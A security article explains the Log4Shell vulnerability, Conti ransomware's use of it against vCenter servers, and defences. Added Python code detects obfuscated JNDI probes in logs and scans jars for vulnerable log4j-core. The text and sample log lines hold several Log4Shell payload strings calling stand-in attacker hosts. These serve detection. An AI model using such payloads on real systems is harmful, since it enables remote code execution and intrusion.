Log4Shell is the most severe vulnerability to hit systems at the end of 2021. Since its public disclosure on December 9, the security industry has worked hard to patch it and protect against it. Sure enough, cybercriminals have started using it, and it was only a matter of time before one of the most active ransomware groups began exploiting it too.
What is the Log4Shell vulnerability?
The Log4Shell vulnerability (CVE-2021-44228) affects Apache Log4j 2, a Java logging library used by a great deal of software; versions 2.0-beta9 through 2.14.1 are affected. Millions of systems worldwide run a vulnerable version of this library and are at risk.
Security provider Cloudflare says in a blog post that it’s seeing the exploitation pattern in log files up to 1,000 times per second.
What makes it so severe is that it lets an attacker execute arbitrary code on the machine running the vulnerable library. The attacker only needs to get a string such as "${jndi:ldap://attacker-host/a}" into something the application logs, for instance an HTTP header or a username: the library's message lookup feature resolves the expression, sends a JNDI request to the attacker's server, and can load and run a class that server returns. It takes little technical skill to exploit, so it is accessible to practically any attacker, skilled or not.
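The "exploitation pattern" Cloudflare reports seeing in its logs is this same lookup string, and a naive search for "${jndi:" misses the obfuscated variants attackers quickly adopted. The following detector is an added example written for this article, not code from the original piece, from Cloudflare or from the Log4j project. It URL-decodes each line, emulates the handful of Log4j lookups abused for obfuscation (lower, upper, default values such as "${::-j}", quoted date literals) from the inside out, and flags a line once a "${jndi:" prefix appears. The log lines are constructed; 203.0.113.0/24 and the .example names are reserved documentation addresses, not real attackers.

```python
import re
from urllib.parse import unquote

# Added example (not from the article): detect Log4Shell probes in web server logs,
# including the obfuscated forms attackers used to evade a plain "${jndi:" match.

# A ${...} whose body contains no further lookup, i.e. the innermost one.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# Log4j's Interpolator lowercases the lookup prefix, so "${jNdI:" is as dangerous as "${jndi:".
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def resolve_lookup(body):
    """Emulate the subset of Log4j 2 lookups attackers abuse for obfuscation.
    Anything else is reduced to its literal body so the loop always terminates."""
    if ":-" in body:                                  # ${x:-default} -> default, e.g. ${::-j}, ${env:NaN:-j}
        return body.split(":-", 1)[1]
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    m = re.fullmatch(r"date:'([^']*)'", body)         # ${date:'j'} -> the quoted literal
    if m:
        return m.group(1)
    return body


def normalize(text, max_rounds=200):
    """Undo URL encoding (twice, for double-encoded payloads), then resolve nested
    lookups from the inside out until a ${jndi: prefix appears or none are left."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        if JNDI.search(text):
            return text
        m = INNERMOST.search(text)
        if not m:
            break
        text = text[:m.start()] + resolve_lookup(m.group(1)) + text[m.end():]
    return text


def is_log4shell_probe(line):
    return JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return the indices of log lines carrying a Log4Shell payload."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


# Constructed sample log lines (Apache combined format). 203.0.113.0/24 and
# *.example are reserved documentation addresses and names.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.12 - - [10/Dec/2021:03:14:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:l}dap://attacker.example/a}"',
    '203.0.113.13 - - [10/Dec/2021:03:14:15 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example:1099/x} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.14 - - [10/Dec/2021:03:14:18 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.15 - - [10/Dec/2021:03:14:21 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:${date:\'d\'}ns://attacker.example}"',
    '203.0.113.16 - - [10/Dec/2021:03:14:25 +0000] "GET /blog/log4j-jndi-explained HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for i in scan(SAMPLE_LOG):
        print(f"line {i}: {normalize(SAMPLE_LOG[i])}")
```

A hit means a probe was received, not that it succeeded: the last line, which merely mentions jndi in a URL path, is not flagged, and the flagged lines should be correlated with outbound LDAP, RMI or DNS connections from the logging host before calling it a compromise. The lookup emulation is deliberately a subset; Log4j supports more lookups than the four handled here, so treat unknown lookups appearing in request data as suspicious in their own right.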
AdvIntel reported that a week after the vulnerability became public, it started being used by one of the most prolific organized Russian-speaking ransomware groups: Conti.
The organization behind Conti ransomware is well structured. Its business model is ransomware-as-a-service (RaaS): the cybercriminals operating Conti let affiliates use the ransomware as they see fit, provided a percentage of each ransom payment is shared with the operators.
Between July and November 2021, the group is estimated to have received $25.5 million in ransom payments, according to cryptocurrency transaction investigations by Swiss company PRODAFT, while AdvIntel estimates that Conti made over $150 million in the last six months.
Conti uses the "double extortion" scheme: If a company does not pay the ransom, not only is its data lost, it is also exposed publicly on the internet or sold to competitors, since the group exfiltrates the data to its own infrastructure before encrypting it.
Knowledge of the Conti group grew suddenly when a disgruntled affiliate leaked internal material. The leak contained documents mostly written in Cyrillic and exposed a full playbook for compromising companies and infecting them with ransomware, making it uncomfortably easy for any hacker who speaks the language, even one with limited security and networking skills.
The Conti group seems keen on always finding new ways to infect companies and spread its ransomware, and it has often leveraged exploits as initial compromise vectors.
Using the Log4Shell vulnerability, the group specifically targeted VMware vCenter servers. The exploit was used to gain access to the vCenter server and from there move laterally across the targeted company's network. This is a notable difference from other exploits the group uses: here the exploit serves lateral movement inside an already compromised network, after the attackers have obtained initial access by other means.
This is by far the biggest and most lucrative use of Log4Shell so far, since its consequence is likely to be more companies having their business disrupted. Some of them will probably choose to pay the ransom to return to normal operations and avoid having their data exposed on the internet.
The cybercriminals might also find other ways to exploit Log4Shell, including at the initial compromise stage of their attacks, since software other than vCenter is vulnerable.
How to protect yourself from the Log4Shell attacks
VMware has already provided instructions to address the vulnerability in vCenter Server and vCenter Cloud Gateway.
Much more software is vulnerable. Check regularly for updates on affected products and patch, or deploy the vendor's workarounds, as soon as possible. US CISA maintains a comprehensive list of impacted software.
Several security companies provide Log4Shell-specific scanners that IT staff can use to check whether their systems are affected and to find vulnerable systems on their networks.
Cybereason offers a "vaccine" that prevents the vulnerability from being triggered, but it should be seen only as a temporary measure until all systems are patched.
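The host-side check those scanners perform is simple enough to reproduce. The following is an added example written for this article, not the article's own code and not any vendor's scanner: it walks a directory tree, opens every jar, war and ear (including jars nested inside wars, which is where log4j-core usually hides), reads the log4j-core version from its Maven pom.properties, and reports whether the archive is exposed to CVE-2021-44228. The fix thresholds it uses are the ones published by Apache for this CVE: 2.15.0, plus the 2.12.2 backport for Java 7 and 2.3.1 for Java 6. Because Apache's documented workaround for versions that cannot be upgraded immediately is to delete the JndiLookup class from the jar, the scanner also reports whether that class is present. The fixture jars it builds are constructed stand-ins containing only a pom.properties and a dummy class entry, not real Log4j.

```python
import io
import os
import re
import tempfile
import zipfile

# Added example (not from the article): find log4j-core archives on disk, read their
# version and report whether they are exposed to CVE-2021-44228.

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). None if unparsable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    return tuple(int(x or 0) for x in m.groups()) if m else None


def is_fixed(v):
    """CVE-2021-44228 is fixed in 2.15.0 and in the 2.12.2 (Java 7) and 2.3.1 (Java 6) backports."""
    return (v >= (2, 15, 0)
            or (v[:2] == (2, 12) and v[2] >= 2)
            or (v[:2] == (2, 3) and v[2] >= 1))


def inspect_archive(data, name, findings):
    """Inspect one archive given as bytes; nested jars inside wars/ears are opened in memory."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        if JNDI_CLASS in names or POM_PROPS in names:
            version = None
            if POM_PROPS in names:
                for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        version = line.split("=", 1)[1].strip()
            v = parse_version(version)
            if JNDI_CLASS not in names:
                status = "jndilookup-removed"           # Apache's documented workaround applied
            elif v is None:
                status = "unknown-version-investigate"  # shaded or repackaged build without pom.properties
            elif is_fixed(v):
                status = "patched"
            else:
                status = "VULNERABLE"
            findings.append({"path": name, "version": version, "status": status})
        for entry in names:                             # recurse into bundled archives
            if entry.lower().endswith(ARCHIVE_EXT):
                inspect_archive(zf.read(entry), f"{name}!{entry}", findings)


def scan_tree(root):
    """Walk a directory tree and return findings with paths relative to root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, f)
                with open(full, "rb") as fh:
                    inspect_archive(fh.read(), os.path.relpath(full, root), findings)
    return findings


def make_jar_bytes(version, with_jndi):
    """Constructed stand-in for log4j-core: only pom.properties and a dummy JndiLookup entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only, not real bytecode
    return buf.getvalue()


def build_fixture(root):
    """Constructed fixture: four loose jars plus a WAR bundling an old log4j-core."""
    cases = {
        "lib/log4j-core-2.14.1.jar": make_jar_bytes("2.14.1", True),          # vulnerable
        "lib/log4j-core-2.15.0.jar": make_jar_bytes("2.15.0", True),          # patched
        "lib/log4j-core-2.12.2.jar": make_jar_bytes("2.12.2", True),          # Java 7 backport fix
        "lib/log4j-core-2.14.1-nojndi.jar": make_jar_bytes("2.14.1", False),  # JndiLookup.class deleted
    }
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.11.1.jar", make_jar_bytes("2.11.1", True))
    cases["webapps/app.war"] = war.getvalue()
    for rel, data in cases.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


def demo():
    """Build the constructed fixture in a temp dir, scan it, return {path: status}."""
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        return {f["path"]: f["status"] for f in scan_tree(root)}


if __name__ == "__main__":
    for path, status in sorted(demo().items()):
        print(f"{status:28} {path}")
```

Run it against real application directories by calling scan_tree on them instead of the fixture. Two caveats a practitioner should keep in mind: a repackaged or shaded build may carry no pom.properties, so "unknown-version-investigate" must be followed up rather than ignored, and the thresholds above cover CVE-2021-44228 only, the vulnerability this article discusses; later Log4j advisories raised the recommended minimum version further, so check the current Apache guidance when deciding what "patched" means for you.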
How to protect yourself from ransomware
- Keep all systems and software up to date.
- Conduct security audits and fix whatever security problem appears.
- Perform regular backups, but keep them offline as much as possible, as ransomware often looks for backup systems and destroys them.
- Reduce the attack surface by carefully disabling any protocol or system that is not needed. As an example, if FTP is not needed somewhere, disable it.
- Enable two-factor authentication (2FA) whenever possible, especially for remote access connections.
- Restrict user privileges to only the resources they need for their work.
- Use intrusion prevention systems (IPS) / intrusion detection systems (IDS).
- Run security awareness programs for all employees.
Disclosure: I work for Trend Micro, but the views expressed in this article are mine.